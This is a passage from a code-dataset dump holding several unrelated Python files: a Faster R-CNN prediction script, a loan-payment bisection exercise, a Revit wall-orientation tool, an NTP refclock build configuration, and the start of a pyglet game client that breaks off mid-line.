content=clean.from_html(response['content']['rendered'])\r\n )\r\n\r\n log.info('Finished query \"%s\" using WordPress API at: %s', query, url)\r\n","sub_path":"wordpress.py","file_name":"wordpress.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447014398","text":"import os\nimport argparse\nimport pandas as pd\nimport torch\nfrom PIL import Image\nimport torchvision.transforms as T\nfrom torchvision.ops.boxes import box_convert\nfrom netcode.net import custom_fasterrcnn_resnet50_fpn\n\n# Parsing script arguments\nparser = argparse.ArgumentParser(description='Process input')\nparser.add_argument('input_folder', type=str, help='Input folder path, containing images')\nargs = parser.parse_args()\n\n# Reading input folder\nfiles = os.listdir(args.input_folder)\n\n#####\nbbox_pred = []\nproper_mask_pred = []\n\n# Setting up device\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\nprint(f'Predicting on {device}')\n\n# Setting up the model\nmodel = custom_fasterrcnn_resnet50_fpn()\nmodel.load_state_dict(torch.load('model_epoch_2_loss_0.134.pt', map_location=device)[\"model_state\"])\nmodel = model.to(device)\n\nmodel.eval()\nfor file_name in files:\n img = Image.open(os.path.join(args.input_folder, file_name)).convert('RGB')\n img = [T.ToTensor()(img)]\n _, prediction = model(img)\n\n bbox_xyxy = prediction[0]['boxes'][0].unsqueeze(0)\n bbox = box_convert(bbox_xyxy, in_fmt='xyxy', out_fmt='xywh')\n proper_mask = prediction[0]['labels'][0].item()\n\n bbox_pred.append(bbox)\n proper_mask_pred.append(proper_mask)\n\nprediction_df = pd.DataFrame(zip(files, *bbox_pred, proper_mask_pred),\n columns=['filename', 'x', 'y', 'w', 'h', 'proper_mask'])\nprediction_df.to_csv(\"prediction.csv\", index=False, header=True)\n","sub_path":"netcode/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497100843","text":"balance = 320000\r\nannualInterestRate = 0.2\r\n\r\n\r\n\r\n\r\n\r\n\r\nmonthlyInterestRate = annualInterestRate / 12.0\r\nminimumFixedMonthlyPaymentBound = balance/12.0\r\nmaximumFixedMonthlyPaymentBound = (balance * (1 + monthlyInterestRate)**12) / 12.0\r\noldBalance = balance\r\nminimumFixedMonthlyPayment = 0.015\r\nwhile balance >= 0.01 or balance <= -0.01: \r\n balance = oldBalance\r\n minimumFixedMonthlyPayment = (minimumFixedMonthlyPaymentBound + maximumFixedMonthlyPaymentBound) / 2\r\n for i in range(12):\r\n balance = (balance - minimumFixedMonthlyPayment) * (1 + monthlyInterestRate)\r\n if balance < 0:\r\n maximumFixedMonthlyPaymentBound = minimumFixedMonthlyPayment \r\n else:\r\n minimumFixedMonthlyPaymentBound = minimumFixedMonthlyPayment\r\n\r\n\r\nprint(\"Lowest Payment:\", round(minimumFixedMonthlyPayment, 2))\r\n\r\n","sub_path":"ProblemSet2_Problem3.py","file_name":"ProblemSet2_Problem3.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629788534","text":"\"\"\"Inscribe en el parametro \"ORIENTACION\" la orientacion de la normal de los muros\"\"\"\r\n\r\n__title__ = 'Orientacion\\nde Muros'\r\n__author__ = 'Carlos Romero'\r\n\r\n#for timing\r\nfrom pyrevit.coreutils import Timer\r\ntimer = Timer()\r\n\r\nfrom Autodesk.Revit.DB import Transaction, FilteredElementCollector, BuiltInCategory\r\nimport Autodesk.Revit.DB as DB\r\nimport clr\r\n\r\ndoc = __revit__.ActiveUIDocument.Document\r\nuidoc = __revit__.ActiveUIDocument\r\n\r\nwalls = DB.FilteredElementCollector(doc).OfCategory(BuiltInCategory.OST_Walls).WhereElementIsNotElementType().ToElements()\r\nnew_walls = []\r\nori_x = []\r\nori_y = []\r\nprint(\"Muros en el modelo: \" + str(len(walls)))\r\nfor wall in walls:\r\n\ttry:\r\n\t\tori_x.append( round( wall.Orientation.Normalize().X , 4))\r\n\t\tori_y.append( round( wall.Orientation.Normalize().Y , 4))\r\n\t\tnew_walls.append(wall)\r\n\texcept:\r\n\t\tprint(\"No ha podido sacar la orientacion de uno de los muros.\")\r\n\t\t\r\nprint(\"Muros con orientacion: \" + str(len(new_walls)))\r\ndef ori (x, y):\r\n\tif x <= 0.3826 and x >= -0.3826 and y <= 1 and y >= 0.9238:\r\n\t\treturn \"North\"\r\n\telif x < 0.8660 and x > 0.3826 and y < 0.9238 and y > 0.5000:\r\n\t\treturn \"Northeast\"\r\n\telif x <= 1 and x >= 0.8660 and y <= 0.5000 and y >= -0.3583:\r\n\t\treturn \"East\"\r\n\telif x < 0.9335 and x > 0.3090 and y < -0.3583 and y > -0.9510:\r\n\t\treturn \"Southeast\"\r\n\telif x <= 0.3090 and x >= -0.3090 and y <= -0.9510 and y >= -1:\r\n\t\treturn \"South\"\r\n\telif x < -0.3090 and x > -0.9335 and y < -0.3583 and y > -0.9510:\r\n\t\treturn \"Southwest\"\t\r\n\telif x <= -0.8660 and x >= -1 and y <= 0.5000 and y >= -0.3583:\r\n\t\treturn \"West\"\r\n\telif x < -0.3826 and x > -0.8660 and y < 0.9238 and y > 0.5000:\r\n\t\treturn \"Northwest\"\r\n\telse:\r\n\t\treturn \"Sin orientacion\"\r\nres = []\r\nfor x, y in zip (ori_x,ori_y):\r\n\tres.append(ori(x,y))\r\n\t\r\nt = Transaction(doc, \"Orientacion Muros\")\r\nt.Start()\r\n\r\nfor wall, dir in zip(new_walls,res):\r\n\tif wall.LookupParameter(\"Orientacion\"):\r\n\t\ttry:\r\n\t\t\twall.LookupParameter(\"Orientacion\").Set(dir)\r\n\t\texcept:\r\n\t\t\tprint(\"No se puede escribir en el parametro de uno de los muros.\")\r\n\t\r\n\t\r\nt.Commit()\r\n\r\n\r\n#for timing\r\nendtime =\"He tardado: \" + str(timer.get_time()) + \" segundos.\"\r\nprint(endtime)\r\n","sub_path":"orientacion_script.py","file_name":"orientacion_script.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300274107","text":"from waflib.Configure import conf\nfrom waflib.Logs import pprint\n\n# Note: When you change this list. also check the following files:\n# doc/recflock.txt\n# include/ntp.h\n# libntp/clocktypes.c\n# ntpd/refclock_conf.c\n\nrefclock_map = {\n\n\t1: {\n\t\t\"descr\":\t\"Undisciplined Local Clock\",\n\t\t\"define\":\t\"CLOCK_LOCAL\",\n\t\t\"file\":\t\t\"local\"\n\t},\n\n\t4: {\n\t\t\"descr\":\t\"Spectracom WWVB/GPS Receivers\",\n\t\t\"define\":\t\"CLOCK_SPECTRACOM\",\n\t\t\"file\":\t\t\"spectracom\"\n\t},\n\n\t5: {\n\t\t\"descr\":\t\"TrueTime GPS/GOES/OMEGA Receivers\",\n\t\t\"define\":\t\"CLOCK_TRUETIME\",\n\t\t\"file\":\t\t\"true\"\n\t},\n\n\t6: {\n\t\t\"descr\":\t\"IRIG Audio Decoder\",\n\t\t\"define\":\t\"CLOCK_IRIG\",\n\t\t\"require\":\t[\"audio\"],\n\t\t\"file\":\t\t\"irig\"\n\t},\n\n\t7: {\n\t\t\"descr\":\t\"Radio CHU Audio Demodulator/Decoder\",\n\t\t\"define\":\t\"CLOCK_CHU\",\n\t\t\"require\":\t[\"audio\"],\n\t\t\"file\":\t\t\"chu\"\n\t},\n\n\t8: {\n\t\t\"descr\":\t\"Generic Reference Driver (Parse)\",\n\t\t\"define\":\t\"CLOCK_PARSE\",\n\t\t\"require\":\t[\"parse\"],\n\t\t\"file\":\t\t\"parse\"\n\t},\n\n\t9: {\n\t\t\"descr\":\t\"Magnavox MX4200 GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_MX4200\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"mx4200\"\n\t},\n\n\t10: {\n\t\t\"descr\":\t\"Austron 2200A/2201A GPS Receivers\",\n\t\t\"define\":\t\"CLOCK_AS2201\",\n\t\t\"file\":\t\t\"as2201\"\n\t},\n\n\t11: {\n\t\t\"descr\":\t\"Arbiter 1088A/B GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_ARBITER\",\n\t\t\"file\":\t\t\"arbiter\"\n\t},\n\n\t18: {\n\t\t\"descr\":\t\"NIST/USNO/PTB Modem Time Services\",\n\t\t\"define\":\t\"CLOCK_ACTS\",\n\t\t\"file\":\t\t\"acts\"\n\t},\n\n\t20: {\n\t\t\"descr\":\t\"Generic NMEA GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_NMEA\",\n\t\t\"file\":\t\t\"nmea\"\n\t},\n\n\t22: {\n\t\t\"descr\":\t\"PPS Clock Discipline\",\n\t\t\"define\":\t\"CLOCK_ATOM\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"atom\"\n\t},\n\n\t26: {\n\t\t\"descr\":\t\"Hewlett Packard 58503A GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_HPGPS\",\n\t\t\"file\":\t\t\"hpgps\"\n\t},\n\n\t27: {\n\t\t\"descr\":\t\"Arcron MSF Receiver\",\n\t\t\"define\":\t\"CLOCK_ARCRON_MSF\",\n\t\t\"file\":\t\t\"arc\"\n\t},\n\n\t28: {\n\t\t\"descr\":\t\"Shared Memory Driver\",\n\t\t\"define\":\t\"CLOCK_SHM\",\n\t\t\"file\":\t\t\"shm\"\n\t},\n\n\t29: {\n\t\t\"descr\":\t\"Trimble Navigation Palisade GPS\",\n\t\t\"define\":\t\"CLOCK_PALISADE\",\n\t\t\"file\":\t\t\"palisade\"\n\t},\n\n\t30: {\n\t\t\"descr\":\t\"Motorola UT Oncore GPS\",\n\t\t\"define\":\t\"CLOCK_ONCORE\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"oncore\"\n\t},\n\n\t31: {\n\t\t\"descr\":\t\"Rockwell Jupiter GPS\",\n\t\t\"define\":\t\"CLOCK_JUPITER\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"jupiter\"\n\t},\n\n\t33: {\n\t\t\"descr\":\t\"Dumb Clock\",\n\t\t\"define\":\t\"CLOCK_DUMBCLOCK\",\n\t\t\"file\":\t\t\"dumbclock\"\n\t},\n\n\t35: {\n\t\t\"descr\":\t\"Conrad Parallel Port Radio Clock\",\n\t\t\"define\":\t\"CLOCK_PCF\",\n\t\t\"file\":\t\t\"pcf\"\n\t},\n\n\t38: {\n\t\t\"descr\":\t\"hopf GPS/DCF77 6021/komp for Serial Line\",\n\t\t\"define\":\t\"CLOCK_HOPF_SERIAL\",\n\t\t\"file\":\t\t\"hopfser\"\n\t},\n\n\t39: {\n\t\t\"descr\":\t\"hopf GPS/DCF77 6039 for PCI-Bus\",\n\t\t\"define\":\t\"CLOCK_HOPF_PCI\",\n\t\t\"file\":\t\t\"hopfpci\"\n\t},\n\n\t40: {\n\t\t\"descr\":\t\"JJY Receivers\",\n\t\t\"define\":\t\"CLOCK_JJY\",\n\t\t\"file\":\t\t\"jjy\"\n\t},\n\n\t42: {\n\t\t\"descr\":\t\"Zyfer GPStarplus Receiver\",\n\t\t\"define\":\t\"CLOCK_ZYFER\",\n\t\t\"file\":\t\t\"zyfer\"\n\t},\n\n\t44: {\n\t\t\"descr\":\t\"NeoClock4X - DCF77 / TDF serial line\",\n\t\t\"define\":\t\"CLOCK_NEOCLOCK4X\",\n\t\t\"file\":\t\t\"neoclock4x\"\n\t},\n\n\t45: {\n\t\t\"descr\":\t\"Spectracom TSYNC\",\n\t\t\"define\":\t\"CLOCK_TSYNCPCI\",\n\t\t\"file\":\t\t\"tsyncpci\"\n\t},\n\n\t46: {\n\t\t\"descr\":\t\"GPSD NG client protocol\",\n\t\t\"define\":\t\"CLOCK_GPSDJSON\",\n\t\t\"file\":\t\t\"gpsdjson\"\n\t}\n}\n\n\n\n@conf\ndef refclock_config(ctx):\n\tfrom refclock import refclock_map\n\n\tif ctx.options.refclocks == \"all\":\n\t\tids = refclock_map.keys()\n\telse:\n\t\t# XXX: better error checking\n\t\tids = ctx.options.refclocks.split(\",\")\n\n\tctx.env.REFCLOCK_DEFINES = []\n\tctx.env.REFCLOCK_SOURCE = []\n\n\t# Remove duplicate IDs while preserving order.\n\tunique_id = []\n\t[unique_id.append(x) for x in ids if x not in unique_id]\n\n\n\trefclock = False\n\tfor id in unique_id:\n\t\ttry:\n\t\t\tid = int(id)\n\t\texcept ValueError:\n\t\t\tctx.fatal(\"'%s' is not an integer.\" % id)\n\n\t\tif id not in refclock_map:\n\t\t\tctx.fatal(\"'%s' is not a valid Refclock ID\" % id)\n\n\t\trc = refclock_map[id]\n\n\t\tif rc['define'] == \"CLOCK_PARSE\":\n\t\t\tparse_clocks = (\n\t\t\t\t\"CLOCK_COMPUTIME\",\n\t\t\t\t\"CLOCK_DCF7000\",\n\t\t\t\t\"CLOCK_HOPF6021\",\n\t\t\t\t\"CLOCK_MEINBERG\",\n\t\t\t\t\"CLOCK_RAWDCF\",\n\t\t\t\t\"CLOCK_RCC8000\",\n\t\t\t\t\"CLOCK_SCHMID\",\n\t\t\t\t\"CLOCK_SEL240X\",\n\t\t\t\t\"CLOCK_TRIMTAIP\",\n\t\t\t\t\"CLOCK_TRIMTSIP\",\n\t\t\t\t\"CLOCK_VARITEXT\",\n\t\t\t\t\"CLOCK_WHARTON_400A\",\n\t\t\t\t)\n\t\t\tfor subtype in parse_clocks:\n\t\t\t\tctx.define(subtype, 1, comment=\"Enable individual parse clock\")\n\n\t\tctx.start_msg(\"Enabling Refclock %s (%d):\" % (rc[\"descr\"], id))\n\n\t\tif \"require\" in rc:\n\t\t\tif \"ppsapi\" in rc[\"require\"]:\n\t\t\t\tif not ctx.get_define(\"HAVE_PPSAPI\"):\n\t\t\t\t\tctx.end_msg(\"No\")\n\t\t\t\t\tpprint(\"RED\", \"Refclock \\\"%s\\\" disabled, PPS API has not been detected as working.\" % rc[\"descr\"])\n\t\t\t\t\tcontinue\n\n\t\t\tif \"audio\" in rc[\"require\"]:\n\t\t\t\tif not ctx.env.AUDIO_ENABLE:\n\t\t\t\t\tctx.end_msg(\"No\")\n\t\t\t\t\tpprint(\"RED\", \"Refclock \\\"%s\\\" disabled, Audio (OSS) support is not available.\" % rc[\"descr\"])\n\t\t\t\t\tcontinue\n\n\n\t\tctx.env.REFCLOCK_SOURCE.append((rc[\"file\"], rc[\"define\"]))\n\t\tctx.env[\"REFCLOCK_%s\" % rc[\"file\"].upper()] = True\n\t\tctx.define(rc[\"define\"], 1, comment=\"Enable '%s' refclock\" % rc[\"descr\"])\n\t\tctx.env.REFCLOCK_LIST += [str(id)]\n\n\t\tctx.end_msg(\"Yes\")\n\n\t\trefclock = True\n\n\tif refclock:\n\t\tctx.env.REFCLOCK_ENABLE = True\n\t\tctx.define(\"REFCLOCK\", 1, comment=\"Enable refclock support\")\n","sub_path":"pylib/refclock.py","file_name":"refclock.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414316997","text":"#!/usr/bin/env python3\n\nimport argparse\nimport jsonpickle\nimport json\nimport math\nimport os\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport pyglet\nimport glooey\nfrom pyglet.window import key as KEY\nfrom pyglet import clock\nfrom src.passhash import hashPassword\nfrom src.character import Character\n\n# load the tileset TODO: support different tilesets.\npyglet.resource.path = [\n \"tilesets/Chesthole32/tiles\",\n \"tilesets/Chesthole32/tiles/background\",\n \"tilesets/Chesthole32/tiles/monsters\",\n \"tilesets/Chesthole32/tiles/terrain\",\n]\nfor folder in [\n \"/gfx/\",\n \"gfx/inputbox\",\n \"gfx/background\",\n \"gfx/scrollbox/vbar/backward\",\n \"gfx/scrollbox/vbar/forward\",\n \"gfx/scrollbox/vbar/decoration\",\n \"gfx/scrollbox/vbar/grip\",\n \"gfx/scrollbox/frame/decoration\",\n]:\n pyglet.resource.path.append(folder)\n print(\"Loaded gfx folder\", folder)\npyglet.resource.reindex()\n\nfrom Mastermind._mm_client import MastermindClientTCP\n\nfrom src.action import Action\nfrom src.blueprint import Blueprint\nfrom src.command import Command\nfrom src.item import Item, ItemManager\nfrom src.character import Character\nfrom src.position import Position\nfrom src.recipe import Recipe, RecipeManager\nfrom src.tileManager import TileManager\nfrom src.worldmap import Worldmap\n\n\nclass CustomBackground(glooey.Background):\n custom_center = pyglet.resource.texture(\"center.png\")\n custom_top = pyglet.resource.texture(\"top.png\")\n custom_bottom = pyglet.resource.texture(\"bottom.png\")\n custom_left = pyglet.resource.texture(\"left.png\")\n custom_right = pyglet.resource.texture(\"right.png\")\n custom_top_left = pyglet.resource.image(\"top_left.png\")\n custom_top_right = pyglet.resource.image(\"top_right.png\")\n custom_bottom_left = pyglet.resource.image(\"bottom_left.png\")\n custom_bottom_right = pyglet.resource.image(\"bottom_right.png\")\n\n\nclass InputBox(glooey.Form):\n custom_alignment = \"center\"\n custom_height_hint = 12\n\n class Label(glooey.EditableLabel):\n custom_font_size = 10\n custom_color = \"#b9ad86\"\n custom_alignment = \"center\"\n custom_horz_padding = 4\n custom_top_padding = 2\n custom_width_hint = 200\n custom_height_hint = 12\n # TODO: import string; def format_alpha(entered_string): return \"\".join(char for char in entered_string if char in string.ascii_letters) # only allow valid non-space asicii\n\n class Base(glooey.Background):\n custom_center = pyglet.resource.texture(\"form_center.png\")\n custom_left = pyglet.resource.image(\"form_left.png\")\n custom_right = pyglet.resource.image(\"form_right.png\")\n\n\nclass CharacterGenerationInputBox(glooey.Form):\n custom_alignment = \"center\"\n custom_height_hint = 12\n\n class Label(glooey.EditableLabel):\n custom_font_size = 12\n custom_color = \"#b9ad86\"\n custom_alignment = \"center\"\n custom_horz_padding = 4\n custom_top_padding = 2\n custom_width_hint = 200\n custom_height_hint = 12\n # TODO: import string; def format_alpha(entered_string): return \"\".join(char for char in entered_string if char in string.ascii_letters) # only allow valid non-space asicii\n\n class Base(glooey.Background):\n custom_center = pyglet.resource.texture(\"form_center.png\")\n custom_left = pyglet.resource.image(\"form_left.png\")\n custom_right = pyglet.resource.image(\"form_right.png\")\n\n\nclass CustomScrollBox(glooey.ScrollBox):\n # custom_alignment = 'center'\n custom_size_hint = 300, 200\n custom_height_hint = 200\n\n class Frame(glooey.Frame):\n class Decoration(glooey.Background):\n custom_center = pyglet.resource.texture(\"scrollbox_center.png\")\n\n class Box(glooey.Bin):\n custom_horz_padding = 2\n\n class VBar(glooey.VScrollBar):\n class Decoration(glooey.Background):\n custom_top = pyglet.resource.image(\"bar_top.png\")\n custom_center = pyglet.resource.texture(\"bar_vert.png\")\n custom_bottom = pyglet.resource.image(\"bar_bottom.png\")\n\n class Forward(glooey.Button):\n class Base(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_down.png\")\n\n class Backward(glooey.Button):\n class Base(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_down.png\")\n\n class Grip(glooey.ButtonScrollGrip):\n class Base(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_base.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_base.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_base.png\")\n\n class Over(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_over.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_over.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_over.png\")\n\n class Down(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_down.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_down.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_down.png\")\n\n\nclass CharacterGenerationScrollBox(glooey.ScrollBox):\n custom_alignment = \"center\"\n custom_size_hint = 200, 300\n custom_height_hint = 200\n\n class Frame(glooey.Frame):\n class Decoration(glooey.Background):\n custom_center = pyglet.resource.texture(\"scrollbox_center.png\")\n\n class Box(glooey.Bin):\n custom_horz_padding = 2\n\n class VBar(glooey.VScrollBar):\n class Decoration(glooey.Background):\n custom_top = pyglet.resource.image(\"bar_top.png\")\n custom_center = pyglet.resource.texture(\"bar_vert.png\")\n custom_bottom = pyglet.resource.image(\"bar_bottom.png\")\n\n class Forward(glooey.Button):\n class Base(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_down.png\")\n\n class Backward(glooey.Button):\n class Base(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_down.png\")\n\n class Grip(glooey.ButtonScrollGrip):\n class Base(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_base.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_base.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_base.png\")\n\n class Over(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_over.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_over.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_over.png\")\n\n class Down(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_down.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_down.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_down.png\")\n\n\nclass ConnectButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 14\n\n Label = MyLabel\n # custom_alignment = 'fill'\n # custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\nclass CharacterListButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 14\n\n Label = MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\nclass CreateNewCharacterButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 14\n\n Label = MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self):\n super().__init__(\"Create a Character\")\n\n\nclass CharacterGenButton(glooey.Button):\n custom_padding = 8\n\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 12\n custom_padding = 2\n\n Label = MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\nclass ServerListButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 12\n\n Label = MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Over(glooey.Background):\n custom_color = \"#204a87\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\n# the first Window the user sees.\nclass LoginWindow(glooey.containers.VBox):\n def __init__(self):\n super().__init__()\n\n self.username = InputBox()\n self.password = InputBox()\n\n self.password.push_handlers(\n on_unfocus=lambda w: print(f\"password: ***************\")\n )\n\n self.serverIP = InputBox()\n self.serverPort = InputBox()\n self.serverIP.push_handlers(on_unfocus=lambda w: print(f\"serverIP: '{w.text}'\"))\n self.serverPort.push_handlers(\n on_unfocus=lambda w: print(f\"serverPort: '{w.text}'\")\n )\n\n self.grid = glooey.Grid(0, 0, 0, 0)\n self.padding = 16\n\n self.titleLabel = glooey.Label(\"Cataclysm: Looming Darkness\")\n\n self.grid[0, 1] = self.titleLabel\n\n self.grid[1, 0] = glooey.Label(\"Username:\")\n\n self.grid[1, 1] = self.username\n self.grid[3, 0] = glooey.Label(\"password:\")\n self.grid[3, 1] = self.password\n self.grid[4, 0] = glooey.Label(\"Server IP:\")\n self.grid[4, 1] = self.serverIP\n self.grid[5, 0] = glooey.Label(\"Server Port:\")\n self.grid[5, 1] = self.serverPort\n\n with open(\"client.json\") as f:\n client_data = json.load(f)\n\n self.username.text = client_data[\"username\"]\n self.password.text = client_data[\"password\"]\n self.serverList = client_data[\"serverList\"]\n\n connectButton = ConnectButton(\"Connect\")\n self.grid[6, 1] = connectButton\n\n serverListScrollBox = CustomScrollBox()\n serverListScrollBox.size_hint = 100, 100\n vbox_for_serverlist = glooey.VBox(0)\n for server in self.serverList:\n _button = ServerListButton(server)\n # sets the active server to the one you press.\n _button.push_handlers(on_click=self.set_host_and_port_InputBoxes)\n vbox_for_serverlist.add(_button)\n serverListScrollBox.add(vbox_for_serverlist)\n self.grid[6, 0] = serverListScrollBox\n\n self.add(self.grid)\n\n # self.grid.debug_drawing_problems()\n # self.grid.debug_placement_problems()\n\n def set_host_and_port_InputBoxes(self, server_and_port):\n self.serverIP.text = server_and_port.text.split(\":\")[0]\n self.serverPort.text = server_and_port.text.split(\":\")[1]\n\n\n# The window that let's the user select a character or leads to a Window where you can generate a new one.\nclass CharacterSelectWindow(glooey.containers.VBox):\n def __init__(self, list_of_characters):\n super().__init__()\n\n self.grid = glooey.Grid(0, 0, 0, 0)\n self.grid.padding = 16\n\n self.titleLabel = glooey.Label(\"Please Select or Create a Character.\")\n\n self.grid[0, 1] = self.titleLabel\n\n self.add(self.grid)\n\n self.fill_character_list(list_of_characters)\n\n def fill_character_list(self, list_of_characters):\n characterListScrollBox = CustomScrollBox()\n characterListScrollBox.size_hint = 100, 100\n self.vbox_for_characterlist = glooey.VBox(0)\n # add the create new character button first then add the list the of characters for the user.\n self.create_button = CreateNewCharacterButton()\n\n # add the first button\n self.vbox_for_characterlist.add(self.create_button)\n # add the character buttons\n for character in list_of_characters:\n print(character)\n _decoded = jsonpickle.decode(character, keys=True)\n _button = CharacterListButton(_decoded[\"name\"])\n _button.push_handlers(on_click=self.select_character)\n self.vbox_for_characterlist.add(_button)\n\n characterListScrollBox.add(self.vbox_for_characterlist)\n self.grid[2, 0] = characterListScrollBox\n\n def select_character(self, dt):\n # need to setup the MainWindow and show it.\n pass\n\n\nclass CharacterGenerationWindow(glooey.containers.VBox):\n custom_padding = 16\n # minimum size\n custom_default_cell_size = 2\n # has 6 unchanging buttons on top which control which screen the player is on for genning\n # screens are 'scenario', 'profession', 'traits', 'stats', 'skills', 'description'\n def __init__(self):\n super().__init__()\n\n # our points available to spend on traits\n self.points = 8\n \n\n _screens = [\n \"scenario\",\n \"profession\",\n \"traits\",\n \"stats\",\n \"skills\",\n \"description\",\n ]\n\n # the row of buttons on top. responsible for switching the subcontext below points left.\n top_buttons = glooey.HBox(0)\n\n # finish_button is self. so we can access it easier.\n self.finish_button = ConnectButton(\"Commit\")\n\n for screen in _screens:\n _button = CharacterGenButton(screen)\n top_buttons.add(_button)\n\n top_buttons.add(self.finish_button)\n\n self.add(top_buttons)\n\n # now add the remaining points label\n points_box = glooey.HBox()\n pointsLabel = glooey.Label(\"Points Left:\")\n points_box.add(pointsLabel)\n\n self.pointsLeftLabel = glooey.Label(str(self.points))\n points_box.add(self.pointsLeftLabel)\n self.add(points_box)\n\n # our main_frame will be a single use container that we replace the contents of.\n self.main_frame = glooey.containers.Bin()\n self.main_frame.custom_padding = 8\n self.main_frame.add(self.descriptionTab())\n self.add(self.main_frame)\n\n self.name = ''\n self.gender = ''\n\n class descriptionTab(glooey.containers.Grid):\n def __init__(self):\n super().__init__(0, 0, 0, 0)\n\n self[0, 0] = glooey.Label(\"Name:\")\n self[0, 1] = CharacterGenerationInputBox()\n self[0, 2] = glooey.Label(\"Gender:\")\n self[0, 3] = CharacterGenerationInputBox()\n self[1, 0] = glooey.Label(\"Profession:\")\n self[1, 1] = glooey.Label(\"Default\")\n self[1, 2] = glooey.Label(\"Scenario:\")\n self[1, 3] = glooey.Label(\"Evacuee\")\n self[2, 0] = glooey.Label(\"Stats:\")\n self[2, 1] = glooey.Label(\"Traits:\")\n self[2, 2] = glooey.Label(\"Skills:\")\n self[3, 0] = CharacterGenerationScrollBox()\n self[3, 1] = CharacterGenerationScrollBox()\n self[3, 2] = CharacterGenerationScrollBox()\n \n\n # nameLabel - nameInputBox - genderLabel - genderInputBox\n # professionLabel - selectedProfession - scenarioLabel - selectedScenario\n # statsLabel - TraitsLabel - SkillsLabel\n # statsScrollbox - TraitsScrollbox - SkillsScrollBox\n\n\n# The window after we login with a character. Where the Main game is shown.\nclass mainWindow(glooey.containers.Stack):\n def __init__(self):\n super().__init__()\n\n self.chunk_size = (13, 13) # the only tuple you'll see I swear.\n\n self.map_grid = 